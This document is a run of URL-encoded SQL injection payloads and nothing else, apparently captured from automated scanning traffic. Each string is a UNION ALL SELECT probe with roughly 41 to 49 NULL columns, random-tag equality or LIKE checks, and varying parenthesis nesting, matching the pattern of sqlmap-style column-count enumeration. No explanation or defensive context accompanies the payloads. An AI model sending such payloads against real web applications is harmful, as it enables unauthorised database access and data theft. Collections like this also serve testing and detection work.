1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27HuVl%27%3D%27HuVl 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27HSRU%27%3D%27HSRU 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27zpfY%27%3D%27zpfY 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27EdHg%27%3D%27EdHg 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27VTZW%27%3D%27VTZW 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27eSGY%27%3D%27eSGY 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27UVRe%27%3D%27UVRe 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27Lckf%27%20LIKE%20%27Lckf 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27QOGB%27%20LIKE%20%27QOGB 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27pHNl%27%20LIKE%20%27pHNl 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27AjFL%27%20LIKE%20%27AjFL 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27RqkV%27%20LIKE%20%27RqkV 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27XfgP%27%20LIKE%20%27XfgP 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27Cibo%27%20LIKE%20%27Cibo 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27rRZJ%27%20LIKE%20%27rRZJ 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27oNkl%27%20LIKE%20%27oNkl 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27SSQY%27%20LIKE%20%27SSQY 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27zNgJ%27%20LIKE%20%27zNgJ 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27rAXH%27%20LIKE%20%27rAXH 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27vAsA%27%20LIKE%20%27vAsA 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27HoYx%27%20LIKE%20%27HoYx 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27JuSQ%27%20LIKE%20%27JuSQ 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27nQoH%27%20LIKE%20%27nQoH 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27iNBz%27%20LIKE%20%27iNBz 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27ZDyT%27%20LIKE%20%27ZDyT 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27DtUh%27%20LIKE%20%27DtUh 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27CmlF%27%20LIKE%20%27CmlF 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27YgwO%27%20LIKE%20%27YgwO 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27Tngy%27%20LIKE%20%27Tngy 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27vNmE%27%20LIKE%20%27vNmE 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27xfCT%27%20LIKE%20%27xfCT 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27xvtg%27%20LIKE%20%27xvtg 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27RwMh%27%20LIKE%20%27RwMh 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27YTZz%27%20LIKE%20%27YTZz 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27QhTa%27%20LIKE%20%27QhTa 